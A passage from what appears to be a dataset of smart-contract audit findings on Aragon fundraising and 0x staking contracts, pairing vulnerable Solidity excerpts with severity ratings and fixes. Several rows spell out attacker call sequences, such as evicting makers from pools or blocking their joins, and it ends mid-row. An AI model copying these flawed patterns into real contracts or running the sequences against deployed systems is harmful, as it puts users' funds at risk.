Fix,medium,"When a trader submits a sell order, `_openSellOrder()` function checks that there are enough tokens in `reserve` by calling `_poolBalanceIsSufficient` function\\n```\\nfunction \\_poolBalanceIsSufficient(address \\_collateral) internal view returns (bool) {\\n return controller.balanceOf(address(reserve), \\_collateral) >= collateralsToBeClaimed[\\_collateral];\\n}\\n```\\n\\nthe problem is that because `collateralsToBeClaimed[_collateral]` has increased, `controller.balanceOf(address(reserve), _collateral)` could also increase. It happens so because `controller.balanceOf()` function subtracts tapped amount from the reserve's balance.\\n```\\nfunction balanceOf(address \\_who, address \\_token) public view isInitialized returns (uint256) {\\n uint256 balance = \\_token == ETH ? \\_who.balance : ERC20(\\_token).staticBalanceOf(\\_who);\\n\\n if (\\_who == address(reserve)) {\\n return balance.sub(tap.getMaximumWithdrawal(\\_token));\\n } else {\\n return balance;\\n }\\n}\\n```\\n\\nAnd `tap.getMaximumWithdrawal(_token)` could decrease because it depends on `collateralsToBeClaimed[_collateral]`\\n```\\nfunction \\_tappedAmount(address \\_token) internal view returns (uint256) {\\n uint256 toBeKept = controller.collateralsToBeClaimed(\\_token).add(floors[\\_token]);\\n uint256 balance = \\_token == ETH ? address(reserve).balance : ERC20(\\_token).staticBalanceOf(reserve);\\n uint256 flow = (\\_currentBatchId().sub(lastTappedAmountUpdates[\\_token])).mul(rates[\\_token]);\\n uint256 tappedAmount = tappedAmounts[\\_token].add(flow);\\n /\\*\\*\\n \\* whatever happens enough collateral should be\\n \\* kept in the reserve pool to guarantee that\\n \\* its balance is kept above the floor once\\n \\* all pending sell orders are claimed\\n \\*/\\n\\n /\\*\\*\\n \\* the reserve's balance is already below the balance to be kept\\n \\* the tapped amount should be reset to zero\\n \\*/\\n if (balance <= toBeKept) {\\n return 0;\\n }\\n\\n /\\*\\*\\n \\* the reserve's balance minus the upcoming tap flow would be below the balance to be kept\\n \\* the flow should be reduced to balance - toBeKept\\n \\*/\\n if (balance <= toBeKept.add(tappedAmount)) {\\n return balance.sub(toBeKept);\\n }\\n\\n /\\*\\*\\n \\* the reserve's balance minus the upcoming flow is above the balance to be kept\\n \\* the flow can be added to the tapped amount\\n \\*/\\n return tappedAmount;\\n}\\n```\\n\\nThat means that the amount that beneficiary can withdraw has just decreased, which should not be possible.",Ensure that `tappedAmount` cannot be decreased once updated.,,"```\\nfunction \\_poolBalanceIsSufficient(address \\_collateral) internal view returns (bool) {\\n return controller.balanceOf(address(reserve), \\_collateral) >= collateralsToBeClaimed[\\_collateral];\\n}\\n```\\n" +Presale - contributionToken double cast and invalid comparison,medium,"The Presale can be configured to accept `ETH` or a valid `ERC20` `token`. This `token` is stored as an `ERC20` contract type in the state variable `contributionToken`. It is then directly compared to constant `ETH` which is `address(0x0)` in various locations. Additionally, the `_transfer` function double casts the `token` to `ERC20` if the `contributionToken` is passed as an argument.\\n`contribute` - invalid comparison of contract type against `address(0x00)`. Even though this is accepted in solidity `<0.5.0` it is going to raise a compiler error with newer versions (>=0.5.0).\\n```\\nfunction contribute(address \\_contributor, uint256 \\_value) external payable nonReentrant auth(CONTRIBUTE\\_ROLE) {\\n require(state() == State.Funding, ERROR\\_INVALID\\_STATE);\\n\\n if (contributionToken == ETH) {\\n require(msg.value == \\_value, ERROR\\_INVALID\\_CONTRIBUTE\\_VALUE);\\n } else {\\n require(msg.value == 0, ERROR\\_INVALID\\_CONTRIBUTE\\_VALUE);\\n }\\n```\\n\\n`_transfer` - double cast `token` to `ERC20` if it is the contribution `token`.\\n```\\nrequire(ERC20(\\_token).safeTransfer(\\_to, \\_amount), ERROR\\_TOKEN\\_TRANSFER\\_REVERTED);\\n```\\n",`contributionToken` can either be `ETH` or a valid `ERC20` contract address. It is therefore recommended to store the token as an address type instead of the more precise contract type to resolve the double cast and the invalid contract type to address comparison or cast the `ERC20` type to `address()` before comparison.,,"```\\nfunction contribute(address \\_contributor, uint256 \\_value) external payable nonReentrant auth(CONTRIBUTE\\_ROLE) {\\n require(state() == State.Funding, ERROR\\_INVALID\\_STATE);\\n\\n if (contributionToken == ETH) {\\n require(msg.value == \\_value, ERROR\\_INVALID\\_CONTRIBUTE\\_VALUE);\\n } else {\\n require(msg.value == 0, ERROR\\_INVALID\\_CONTRIBUTE\\_VALUE);\\n }\\n```\\n" +Fees are not returned for buy orders if a batch is canceled Won't Fix,medium,"Every trader pays fees on each buy order and transfers it directly to the `beneficiary`.\\n```\\nuint256 fee = \\_value.mul(buyFeePct).div(PCT\\_BASE);\\nuint256 value = \\_value.sub(fee);\\n\\n// collect fee and collateral\\nif (fee > 0) {\\n \\_transfer(\\_buyer, beneficiary, \\_collateral, fee);\\n}\\n\\_transfer(\\_buyer, address(reserve), \\_collateral, value);\\n```\\n\\nIf the batch is canceled, fees are not returned to the traders because there is no access to the beneficiary account.\\nAdditionally, fees are returned to traders for all the sell orders if the batch is canceled.",Consider transferring fees to a beneficiary only after the batch is over.,,"```\\nuint256 fee = \\_value.mul(buyFeePct).div(PCT\\_BASE);\\nuint256 value = \\_value.sub(fee);\\n\\n// collect fee and collateral\\nif (fee > 0) {\\n \\_transfer(\\_buyer, beneficiary, \\_collateral, fee);\\n}\\n\\_transfer(\\_buyer, address(reserve), \\_collateral, value);\\n```\\n" +Tap - Controller should not be updateable,medium,"Similar to the issue 6.11, `Tap` allows updating the `Controller` contract it is using. The permission is currently not assigned in the `FundraisingMultisigTemplate` but might be used in custom deployments.\\n```\\n/\\*\\*\\n \\* @notice Update controller to `\\_controller`\\n \\* @param \\_controller The address of the new controller contract\\n\\*/\\nfunction updateController(IAragonFundraisingController \\_controller) external auth(UPDATE\\_CONTROLLER\\_ROLE) {\\n require(isContract(\\_controller), ERROR\\_CONTRACT\\_IS\\_EOA);\\n\\n \\_updateController(\\_controller);\\n}\\n```\\n","To avoid inconsistencies, we suggest to remove this functionality and provide a guideline on how to safely upgrade components of the system.",,"```\\n/\\*\\*\\n \\* @notice Update controller to `\\_controller`\\n \\* @param \\_controller The address of the new controller contract\\n\\*/\\nfunction updateController(IAragonFundraisingController \\_controller) external auth(UPDATE\\_CONTROLLER\\_ROLE) {\\n require(isContract(\\_controller), ERROR\\_CONTRACT\\_IS\\_EOA);\\n\\n \\_updateController(\\_controller);\\n}\\n```\\n" +Tap - reserve can be updated in Tap but not in MarketMaker or Controller,medium,"The address of the pool/reserve contract can be updated in `Tap` if someone owns the `UPDATE_RESERVE_ROLE` permission. The permission is currently not assigned in the template.\\nThe reserve is being referenced by multiple Contracts. `Tap` interacts with it to transfer funds to the beneficiary, `Controller` adds new protected tokens, and `MarketMaker` transfers funds when someone sells their Shareholder token.\\nUpdating reserve only in `Tap` is inconsistent with the system as the other contracts are still referencing the old reserve unless they are updated via the Aragon Application update mechanisms.\\n```\\n/\\*\\*\\n \\* @notice Update reserve to `\\_reserve`\\n \\* @param \\_reserve The address of the new reserve [pool] contract\\n\\*/\\nfunction updateReserve(Vault \\_reserve) external auth(UPDATE\\_RESERVE\\_ROLE) {\\n require(isContract(\\_reserve), ERROR\\_CONTRACT\\_IS\\_EOA);\\n\\n \\_updateReserve(\\_reserve);\\n}\\n```\\n",Remove the possibility to update reserve in `Tap` to keep the system consistent. Provide information about update mechanisms in case the reserve needs to be updated for all components.,,"```\\n/\\*\\*\\n \\* @notice Update reserve to `\\_reserve`\\n \\* @param \\_reserve The address of the new reserve [pool] contract\\n\\*/\\nfunction updateReserve(Vault \\_reserve) external auth(UPDATE\\_RESERVE\\_ROLE) {\\n require(isContract(\\_reserve), ERROR\\_CONTRACT\\_IS\\_EOA);\\n\\n \\_updateReserve(\\_reserve);\\n}\\n```\\n" +Presale can be opened earlier than initially assigned date,medium,"There are 2 ways how presale opening date can be assigned. Either it's defined on initialization or the presale will start when `open()` function is executed.\\n```\\nif (\\_openDate != 0) {\\n \\_setOpenDate(\\_openDate);\\n}\\n```\\n\\nThe problem is that even if `openDate` is assigned to some non-zero date, it can still be opened earlier by calling `open()` function.\\n```\\nfunction open() external auth(OPEN\\_ROLE) {\\n require(state() == State.Pending, ERROR\\_INVALID\\_STATE);\\n\\n \\_open();\\n}\\n```\\n",Require that `openDate` is not set (0) when someone manually calls the `open()` function.,,```\\nif (\\_openDate != 0) {\\n \\_setOpenDate(\\_openDate);\\n}\\n```\\n +Presale - should not allow zero value contributions,low,"The Presale accepts zero value contributions emitting a contribution event if none of the Aragon components (TokenManager, MinimeToken) raises an exception.\\n```\\nfunction contribute(address \\_contributor, uint256 \\_value) external payable nonReentrant auth(CONTRIBUTE\\_ROLE) {\\n require(state() == State.Funding, ERROR\\_INVALID\\_STATE);\\n\\n if (contributionToken == ETH) {\\n require(msg.value == \\_value, ERROR\\_INVALID\\_CONTRIBUTE\\_VALUE);\\n } else {\\n require(msg.value == 0, ERROR\\_INVALID\\_CONTRIBUTE\\_VALUE);\\n }\\n\\n \\_contribute(\\_contributor, \\_value);\\n}\\n```\\n",Reject zero value `ETH` or `ERC20` contributions.,,"```\\nfunction contribute(address \\_contributor, uint256 \\_value) external payable nonReentrant auth(CONTRIBUTE\\_ROLE) {\\n require(state() == State.Funding, ERROR\\_INVALID\\_STATE);\\n\\n if (contributionToken == ETH) {\\n require(msg.value == \\_value, ERROR\\_INVALID\\_CONTRIBUTE\\_VALUE);\\n } else {\\n require(msg.value == 0, ERROR\\_INVALID\\_CONTRIBUTE\\_VALUE);\\n }\\n\\n \\_contribute(\\_contributor, \\_value);\\n}\\n```\\n" +FundraisingMultisigTemplate - should use BaseTemplate._createPermissionForTemplate() to assign permissions to itself,low,"The template temporarily assigns permissions to itself to be able to configure parts of the system. This can either be done by calling `acl.createPermission(address(this), app, role, manager)` or by using a distinct method provided with the DAO-Templates BaseTemplate `_createPermissionForTemplate`.\\nWe suggest that in order to make it clear that permissions are assigned to the template and make it easier to audit that permissions are either revoked or transferred before the DAO is transferred to the new user, the method provided and used with the default Aragon DAO-Templates should be used.\\nuse `createPermission` if permissions are assigned to an entity other than the template contract.\\nuse `_createPermissionForTemplate` when creating permissions for the template contract.\\n```\\n// create and grant ADD\\_PROTECTED\\_TOKEN\\_ROLE to this template\\nacl.createPermission(this, controller, controller.ADD\\_COLLATERAL\\_TOKEN\\_ROLE(), this);\\n```\\n\\nSidenote: pass `address(this)` instead of the contract instance to `createPermission`.",Resolution\\nFixed with AragonBlack/[email protected]dd153e0.\\nUse `BaseTemplate._createPermissionForTemplate` to assign permissions to the template.,,"```\\n// create and grant ADD\\_PROTECTED\\_TOKEN\\_ROLE to this template\\nacl.createPermission(this, controller, controller.ADD\\_COLLATERAL\\_TOKEN\\_ROLE(), this);\\n```\\n" +FundraisingMultisigTemplate - misleading comments,low,"The comment mentionsADD_PROTECTED_TOKEN_ROLE but permissions for `ADD_COLLATERAL_TOKEN_ROLE` are created.\\n```\\n// create and grant ADD\\_PROTECTED\\_TOKEN\\_ROLE to this template\\nacl.createPermission(this, controller, controller.ADD\\_COLLATERAL\\_TOKEN\\_ROLE(), this);\\n```\\n\\n```\\n// transfer ADD\\_PROTECTED\\_TOKEN\\_ROLE\\n\\_transferPermissionFromTemplate(acl, controller, shareVoting, controller.ADD\\_COLLATERAL\\_TOKEN\\_ROLE(), shareVoting);\\n```\\n",`ADD_PROTECTED_TOKEN_ROLE` in the comment should be `ADD_COLLATERAL_TOKEN_ROLE`.,,"```\\n// create and grant ADD\\_PROTECTED\\_TOKEN\\_ROLE to this template\\nacl.createPermission(this, controller, controller.ADD\\_COLLATERAL\\_TOKEN\\_ROLE(), this);\\n```\\n" +FundraisingMultisigTemplate - unnecessary cast to address,low,"The addresses of DAI (argument `address` _dai) and AND (argument `address` _ant) are unnecessarily cast to `address`.\\n```\\nconstructor(\\n DAOFactory \\_daoFactory,\\n ENS \\_ens,\\n MiniMeTokenFactory \\_miniMeFactory,\\n IFIFSResolvingRegistrar \\_aragonID,\\n address \\_dai,\\n address \\_ant\\n)\\n BaseTemplate(\\_daoFactory, \\_ens, \\_miniMeFactory, \\_aragonID)\\n public\\n{\\n \\_ensureAragonIdIsValid(\\_aragonID);\\n \\_ensureMiniMeFactoryIsValid(\\_miniMeFactory);\\n \\_ensureTokenIsContractOrETH(\\_dai);\\n \\_ensureTokenIsContractOrETH(\\_ant);\\n\\n collaterals.push(address(\\_dai));\\n collaterals.push(address(\\_ant));\\n}\\n```\\n","Both arguments are already of type `address`, therefore remove the explicit cast to `address()` when pushing to the `collaterals` array.",,"```\\nconstructor(\\n DAOFactory \\_daoFactory,\\n ENS \\_ens,\\n MiniMeTokenFactory \\_miniMeFactory,\\n IFIFSResolvingRegistrar \\_aragonID,\\n address \\_dai,\\n address \\_ant\\n)\\n BaseTemplate(\\_daoFactory, \\_ens, \\_miniMeFactory, \\_aragonID)\\n public\\n{\\n \\_ensureAragonIdIsValid(\\_aragonID);\\n \\_ensureMiniMeFactoryIsValid(\\_miniMeFactory);\\n \\_ensureTokenIsContractOrETH(\\_dai);\\n \\_ensureTokenIsContractOrETH(\\_ant);\\n\\n collaterals.push(address(\\_dai));\\n collaterals.push(address(\\_ant));\\n}\\n```\\n" +FundraisingMultisigTemplate - DAI/ANT token address cannot be zero,low,"The fundraising template is configured with the `DAI` and `ANT` token address upon deployment and checks if the provided addresses are valid. The check performed is `_ensureTokenIsContractOrETH()` which allows the `address(0)` (constant for ETH) for the token contracts. However, `address(0)` is not a valid option for either `DAI` or `ANT` and the contract expects a valid token address to be provided as the deployment of a new DAO will have unexpected results (collateral `ETH` is added instead of an ERC20 token) or fail (DAI == `ANT` == 0x0).\\n```\\n\\_ensureTokenIsContractOrETH(\\_dai);\\n\\_ensureTokenIsContractOrETH(\\_ant);\\n```\\n\\n```\\n function \\_ensureTokenIsContractOrETH(address \\_token) internal view returns (bool) {\\n require(isContract(\\_token) || \\_token == ETH, ERROR\\_BAD\\_SETTINGS);\\n}\\n```\\n",Resolution\\nFixed with AragonBlack/[email protected]da561ce.\\nUse `isContract()` instead of `_ensureTokenIsContractOrETH()` and optionally require that `collateral[0] != collateral[1]` as an additional check to prevent that the fundraising template is being deployed with an invalid configuration.,,```\\n\\_ensureTokenIsContractOrETH(\\_dai);\\n\\_ensureTokenIsContractOrETH(\\_ant);\\n```\\n +Anyone can remove a maker's pending pool join status,high,"Using behavior described in https://github.com/ConsenSys/0x-v3-staking-audit-2019-10/issues/11, it is possible to delete the pending join status of any maker in any pool by passing in `NIL_POOL_ID` to `removeMakerFromStakingPool`. Note that the attacker in the following example must not be a confirmed member of any pool:\\nThe attacker calls `addMakerToStakingPool(NIL_POOL_ID, makerAddress)`. In this case, `makerAddress` can be almost any address, as long as it has not called `joinStakingPoolAsMaker` (an easy example is address(0)). The key goal of this call is to increment the number of makers in pool 0:\\n```\\n\\_poolById[poolId].numberOfMakers = uint256(pool.numberOfMakers).safeAdd(1).downcastToUint32();\\n```\\n\\nThe attacker calls `removeMakerFromStakingPool(NIL_POOL_ID, targetAddress)`. This function queries `getStakingPoolIdOfMaker(targetAddress)` and compares it to the passed-in pool id. Because the target is an unconfirmed maker, their staking pool id is NIL_POOL_ID:\\n```\\nbytes32 makerPoolId = getStakingPoolIdOfMaker(makerAddress);\\nif (makerPoolId != poolId) {\\n LibRichErrors.rrevert(LibStakingRichErrors.MakerPoolAssignmentError(\\n LibStakingRichErrors.MakerPoolAssignmentErrorCodes.MakerAddressNotRegistered,\\n makerAddress,\\n makerPoolId\\n ));\\n}\\n```\\n\\nThe check passes, and the target's `_poolJoinedByMakerAddress` struct is deleted. Additionally, the number of makers in pool 0 is decreased:\\n```\\ndelete \\_poolJoinedByMakerAddress[makerAddress];\\n\\_poolById[poolId].numberOfMakers = uint256(\\_poolById[poolId].numberOfMakers).safeSub(1).downcastToUint32();\\n```\\n\\nThis can be used to prevent any makers from being confirmed into a pool.",See `issue 5.6`.,,```\\n\\_poolById[poolId].numberOfMakers = uint256(pool.numberOfMakers).safeAdd(1).downcastToUint32();\\n```\\n +MixinParams.setParams bypasses safety checks made by standard StakingProxy upgrade path.,medium,"The staking contracts use a set of configurable parameters to determine the behavior of various parts of the system. The parameters dictate the duration of epochs, the ratio of delegated stake weight vs operator stake, the minimum pool stake, and the Cobb-Douglas numerator and denominator. These parameters can be configured in two ways:\\n```\\n// Call `init()` on the staking contract to initialize storage.\\n(bool didInitSucceed, bytes memory initReturnData) = stakingContract.delegatecall(\\n abi.encodeWithSelector(IStorageInit(0).init.selector)\\n);\\nif (!didInitSucceed) {\\n assembly {\\n revert(add(initReturnData, 0x20), mload(initReturnData))\\n }\\n}\\n \\n// Assert initialized storage values are valid\\n\\_assertValidStorageParams();\\n```\\n\\nAn authorized address can call `MixinParams.setParams` at any time and set the contract's parameters to arbitrary values.\\nThe latter method introduces the possibility of setting unsafe or nonsensical values for the contract parameters: `epochDurationInSeconds` can be set to 0, `cobbDouglassAlphaNumerator` can be larger than `cobbDouglassAlphaDenominator`, `rewardDelegatedStakeWeight` can be set to a value over 100% of the staking reward, and more.\\nNote, too, that by using `MixinParams.setParams` to set all parameters to 0, the `Staking` contract can be re-initialized by way of `Staking.init`. Additionally, it can be re-attached by way of `StakingProxy.attachStakingContract`, as the delegatecall to `Staking.init` will succeed.",Resolution\\nThis is fixed in 0xProject/0x-monorepo#2279. Now the parameter validity is asserted in `setParams()`.\\nEnsure that calls to `setParams` check that the provided values are within the same range currently enforced by the proxy.,,"```\\n// Call `init()` on the staking contract to initialize storage.\\n(bool didInitSucceed, bytes memory initReturnData) = stakingContract.delegatecall(\\n abi.encodeWithSelector(IStorageInit(0).init.selector)\\n);\\nif (!didInitSucceed) {\\n assembly {\\n revert(add(initReturnData, 0x20), mload(initReturnData))\\n }\\n}\\n \\n// Assert initialized storage values are valid\\n\\_assertValidStorageParams();\\n```\\n" +Authorized addresses can indefinitely stall ZrxVaultBackstop catastrophic failure mode,medium,"The `ZrxVaultBackstop` contract was added to allow anyone to activate the staking system's “catastrophic failure” mode if the `StakingProxy` is in “read-only” mode for at least 40 days. To enable this behavior, the `StakingProxy` contract was modified to track the last timestamp at which “read-only” mode was activated. This is done by way of StakingProxy.setReadOnlyMode:\\n```\\n/// @dev Set read-only mode (state cannot be changed).\\nfunction setReadOnlyMode(bool shouldSetReadOnlyMode)\\n external\\n onlyAuthorized\\n{\\n // solhint-disable-next-line not-rely-on-time\\n uint96 timestamp = block.timestamp.downcastToUint96();\\n if (shouldSetReadOnlyMode) {\\n stakingContract = readOnlyProxy;\\n readOnlyState = IStructs.ReadOnlyState({\\n isReadOnlyModeSet: true,\\n lastSetTimestamp: timestamp\\n });\\n```\\n\\nBecause the timestamp is updated even if “read-only” mode is already active, any authorized address can prevent `ZrxVaultBackstop` from activating catastrophic failure mode by repeatedly calling `setReadOnlyMode`.","If “read-only” mode is already active, `setReadOnlyMode(true)` should result in a no-op.",,"```\\n/// @dev Set read-only mode (state cannot be changed).\\nfunction setReadOnlyMode(bool shouldSetReadOnlyMode)\\n external\\n onlyAuthorized\\n{\\n // solhint-disable-next-line not-rely-on-time\\n uint96 timestamp = block.timestamp.downcastToUint96();\\n if (shouldSetReadOnlyMode) {\\n stakingContract = readOnlyProxy;\\n readOnlyState = IStructs.ReadOnlyState({\\n isReadOnlyModeSet: true,\\n lastSetTimestamp: timestamp\\n });\\n```\\n" +Pool 0 can be used to temporarily prevent makers from joining another pool,medium,"`removeMakerFromStakingPool` reverts if the number of makers currently in the pool is 0, due to `safeSub` catching an underflow:\\n```\\n\\_poolById[poolId].numberOfMakers = uint256(\\_poolById[poolId].numberOfMakers).safeSub(1).downcastToUint32();\\n```\\n\\nBecause of this, edge behavior described in issue 5.6 can allow an attacker to temporarily prevent makers from joining a pool:\\nThe attacker calls `addMakerToStakingPool(NIL_POOL_ID, victimAddress)`. This sets the victim's `MakerPoolJoinStatus.confirmed` field to `true` and increases the number of makers in pool 0 to 1:\\n```\\npoolJoinStatus = IStructs.MakerPoolJoinStatus({\\n poolId: poolId,\\n confirmed: true\\n});\\n\\_poolJoinedByMakerAddress[makerAddress] = poolJoinStatus;\\n\\_poolById[poolId].numberOfMakers = uint256(pool.numberOfMakers).safeAdd(1).downcastToUint32();\\n```\\n\\nThe attacker calls `removeMakerFromStakingPool(NIL_POOL_ID, randomAddress)`. The net effect of this call simply decreases the number of makers in pool 0 by 1, back to 0:\\n```\\ndelete \\_poolJoinedByMakerAddress[makerAddress];\\n\\_poolById[poolId].numberOfMakers = uint256(\\_poolById[poolId].numberOfMakers).safeSub(1).downcastToUint32();\\n```\\n\\nTypically, the victim should be able to remove themselves from pool 0 by calling `removeMakerFromStakingPool(NIL_POOL_ID, victimAddress)`, but because the attacker can set the pool's number of makers to 0, the aforementioned underflow causes this call to fail. The victim must first understand what is happening in `MixinStakingPool` before they are able to remedy the situation:\\nThe victim must call `addMakerToStakingPool(NIL_POOL_ID, randomAddress2)` to increase pool 0's number of makers back to 1.\\nThe victim can now call `removeMakerFromStakingPool(NIL_POOL_ID, victimAddress)`, and remove their confirmed status.\\nAdditionally, if the victim in question currently has a pending join, the attacker can use issue 5.1 to first remove their pending status before locking them in pool 0.",See issue 5.1.,,```\\n\\_poolById[poolId].numberOfMakers = uint256(\\_poolById[poolId].numberOfMakers).safeSub(1).downcastToUint32();\\n```\\n +Recommendation: Fix weak assertions in MixinStakingPool stemming from use of NIL_POOL_ID,medium,"The modifier `onlyStakingPoolOperatorOrMaker(poolId)` is used to authorize actions taken on a given pool. The sender must be either the operator or a confirmed maker of the pool in question. However, the modifier queries `getStakingPoolIdOfMaker(maker)`, which returns `NIL_POOL_ID` if the maker's `MakerPoolJoinStatus` struct is not confirmed. This implicitly makes anyone a maker of the nonexistent “pool 0”:\\n```\\nfunction getStakingPoolIdOfMaker(address makerAddress)\\n public\\n view\\n returns (bytes32)\\n{\\n IStructs.MakerPoolJoinStatus memory poolJoinStatus = \\_poolJoinedByMakerAddress[makerAddress];\\n if (poolJoinStatus.confirmed) {\\n return poolJoinStatus.poolId;\\n } else {\\n return NIL\\_POOL\\_ID;\\n }\\n}\\n```\\n\\n`joinStakingPoolAsMaker(poolId)` makes no existence checks on the provided pool id, and allows makers to become pending makers in nonexistent pools.\\n`addMakerToStakingPool(poolId, maker)` makes no existence checks on the provided pool id, allowing makers to be added to nonexistent pools (as long as the sender is an operator or maker in the pool).","Avoid use of `0x00...00` for `NIL_POOL_ID`. Instead, use `2**256 - 1`.\\nImplement stronger checks for pool existence. Each time a pool id is supplied, it should be checked that the pool id is between 0 and `nextPoolId`.\\n`onlyStakingPoolOperatorOrMaker` should revert if `poolId` == `NIL_POOL_ID` or if `poolId` is not in the valid range: (0, nextPoolId).",,```\\nfunction getStakingPoolIdOfMaker(address makerAddress)\\n public\\n view\\n returns (bytes32)\\n{\\n IStructs.MakerPoolJoinStatus memory poolJoinStatus = \\_poolJoinedByMakerAddress[makerAddress];\\n if (poolJoinStatus.confirmed) {\\n return poolJoinStatus.poolId;\\n } else {\\n return NIL\\_POOL\\_ID;\\n }\\n}\\n```\\n +LibFixedMath functions fail to catch a number of overflows,medium,"The `__add()`, `__mul()`, and `__div()` functions perform arithmetic on 256-bit signed integers, and they all miss some specific overflows.\\nAddition Overflows\\n```\\n/// @dev Adds two numbers, reverting on overflow.\\nfunction \\_add(int256 a, int256 b) private pure returns (int256 c) {\\n c = a + b;\\n if (c > 0 && a < 0 && b < 0) {\\n LibRichErrors.rrevert(LibFixedMathRichErrors.BinOpError(\\n LibFixedMathRichErrors.BinOpErrorCodes.SUBTRACTION\\_OVERFLOW,\\n a,\\n b\\n ));\\n }\\n if (c < 0 && a > 0 && b > 0) {\\n LibRichErrors.rrevert(LibFixedMathRichErrors.BinOpError(\\n LibFixedMathRichErrors.BinOpErrorCodes.ADDITION\\_OVERFLOW,\\n a,\\n b\\n ));\\n }\\n}\\n```\\n\\nThe two overflow conditions it tests for are:\\nAdding two positive numbers shouldn't result in a negative number.\\nAdding two negative numbers shouldn't result in a positive number.\\n`__add(-2**255, -2**255)` returns `0` without reverting because the overflow didn't match either of the above conditions.\\nMultiplication Overflows\\n```\\n/// @dev Returns the multiplication two numbers, reverting on overflow.\\nfunction \\_mul(int256 a, int256 b) private pure returns (int256 c) {\\n if (a == 0) {\\n return 0;\\n }\\n c = a \\* b;\\n if (c / a != b) {\\n LibRichErrors.rrevert(LibFixedMathRichErrors.BinOpError(\\n LibFixedMathRichErrors.BinOpErrorCodes.MULTIPLICATION\\_OVERFLOW,\\n a,\\n b\\n ));\\n }\\n}\\n```\\n\\nThe function checks via division for most types of overflows, but it fails to catch one particular case. `__mul(-2**255, -1)` returns `-2**255` without error.\\nDivision Overflows\\n```\\n/// @dev Returns the division of two numbers, reverting on division by zero.\\nfunction \\_div(int256 a, int256 b) private pure returns (int256 c) {\\n if (b == 0) {\\n LibRichErrors.rrevert(LibFixedMathRichErrors.BinOpError(\\n LibFixedMathRichErrors.BinOpErrorCodes.DIVISION\\_BY\\_ZERO,\\n a,\\n b\\n ));\\n }\\n c = a / b;\\n}\\n```\\n\\nIt does not check for overflow. Due to this, `__div(-2**255, -1)` erroneously returns `-2**255`.","For addition, the specific case of `__add(-2**255, -2**255)` can be detected by using a `>= 0` check instead of `> 0`, but the below seems like a clearer check for all cases:\\n```\\n// if b is negative, then the result should be less than a\\nif (b < 0 && c >= a) { /\\* subtraction overflow \\*/ }\\n\\n// if b is positive, then the result should be greater than a\\nif (b > 0 && c <= a) { /\\* addition overflow \\*/ }\\n```\\n\\nFor multiplication and division, the specific values of `-2**255` and `-1` are the only missing cases, so that can be explicitly checked in the `__mul()` and `__div()` functions.",,"```\\n/// @dev Adds two numbers, reverting on overflow.\\nfunction \\_add(int256 a, int256 b) private pure returns (int256 c) {\\n c = a + b;\\n if (c > 0 && a < 0 && b < 0) {\\n LibRichErrors.rrevert(LibFixedMathRichErrors.BinOpError(\\n LibFixedMathRichErrors.BinOpErrorCodes.SUBTRACTION\\_OVERFLOW,\\n a,\\n b\\n ));\\n }\\n if (c < 0 && a > 0 && b > 0) {\\n LibRichErrors.rrevert(LibFixedMathRichErrors.BinOpError(\\n LibFixedMathRichErrors.BinOpErrorCodes.ADDITION\\_OVERFLOW,\\n a,\\n b\\n ));\\n }\\n}\\n```\\n" +Misleading MoveStake event when moving stake from UNDELEGATED to UNDELEGATED,low,"Although moving stake between the same status (UNDELEGATED <=> UNDELEGATED) should be a no-op, calls to `moveStake` succeed even for invalid `amount` and nonsensical `poolId`. The resulting `MoveStake` event can log garbage, potentially confusing those observing events.\\nWhen moving between `UNDELEGATED` and `UNDELEGATED`, each check and function call results in a no-op, save the final event:\\nNeither `from` nor `to` are `StakeStatus.DELEGATED`, so these checks are passed:\\n```\\nif (from.status == IStructs.StakeStatus.DELEGATED) {\\n \\_undelegateStake(\\n from.poolId,\\n staker,\\n amount\\n );\\n}\\n \\nif (to.status == IStructs.StakeStatus.DELEGATED) {\\n \\_delegateStake(\\n to.poolId,\\n staker,\\n amount\\n );\\n}\\n```\\n\\nThe primary state changing function, `_moveStake`, immediately returns because the `from` and `to` balance pointers are equivalent:\\n```\\nif (\\_arePointersEqual(fromPtr, toPtr)) {\\n return;\\n}\\n```\\n\\nFinally, the `MoveStake` event is invoked, which can log completely invalid values for `amount`, `from.poolId`, and to.poolId:\\n```\\nemit MoveStake(\\n staker,\\n amount,\\n uint8(from.status),\\n from.poolId,\\n uint8(to.status),\\n to.poolId\\n);\\n```\\n","If `amount` is 0 or if moving between `UNDELEGATED` and `UNDELEGATED`, this function should no-op or revert. An explicit check for this case should be made near the start of the function.",,"```\\nif (from.status == IStructs.StakeStatus.DELEGATED) {\\n \\_undelegateStake(\\n from.poolId,\\n staker,\\n amount\\n );\\n}\\n \\nif (to.status == IStructs.StakeStatus.DELEGATED) {\\n \\_delegateStake(\\n to.poolId,\\n staker,\\n amount\\n );\\n}\\n```\\n" +Remove unneeded fields from StoredBalance and Pool structs,low,"Resolution\\nThis is fixed in 0xProject/0x-monorepo#2248. As part of a larger refactor, these fields were removed.\\nBoth structs have fields that are only written to, and never read:\\nStoredBalance.isInitialized:\\n```\\nbool isInitialized;\\n```\\n\\nPool.initialized:\\n```\\nbool initialized;\\n```\\n",The unused fields should be removed.,,```\\nbool isInitialized;\\n```\\n +Pool IDs can just be incrementing integers,low,"Pool IDs are currently `bytes32` values that increment by `2**128`. After discussion with the development team, it seems that this was in preparation for a feature that was ultimately not used. Pool IDs should instead just be incrementing integers.\\n```\\n// The upper 16 bytes represent the pool id, so this would be pool id 1. See MixinStakinPool for more information.\\nbytes32 constant internal INITIAL\\_POOL\\_ID = 0x0000000000000000000000000000000100000000000000000000000000000000;\\n\\n// The upper 16 bytes represent the pool id, so this would be an increment of 1. See MixinStakinPool for more information.\\nuint256 constant internal POOL\\_ID\\_INCREMENT\\_AMOUNT = 0x0000000000000000000000000000000100000000000000000000000000000000;\\n```\\n\\n```\\n/// @dev Computes the unique id that comes after the input pool id.\\n/// @param poolId Unique id of pool.\\n/// @return Next pool id after input pool.\\nfunction \\_computeNextStakingPoolId(bytes32 poolId)\\n internal\\n pure\\n returns (bytes32)\\n{\\n return bytes32(uint256(poolId).safeAdd(POOL\\_ID\\_INCREMENT\\_AMOUNT));\\n}\\n```\\n",Resolution\\nThis is fixed in 0xProject/0x-monorepo#2250. Pool IDs now start at 1 and increment by 1 each time.\\nMake pool IDs `uint256` values and simply add 1 to generate the next ID.,,"```\\n// The upper 16 bytes represent the pool id, so this would be pool id 1. See MixinStakinPool for more information.\\nbytes32 constant internal INITIAL\\_POOL\\_ID = 0x0000000000000000000000000000000100000000000000000000000000000000;\\n\\n// The upper 16 bytes represent the pool id, so this would be an increment of 1. See MixinStakinPool for more information.\\nuint256 constant internal POOL\\_ID\\_INCREMENT\\_AMOUNT = 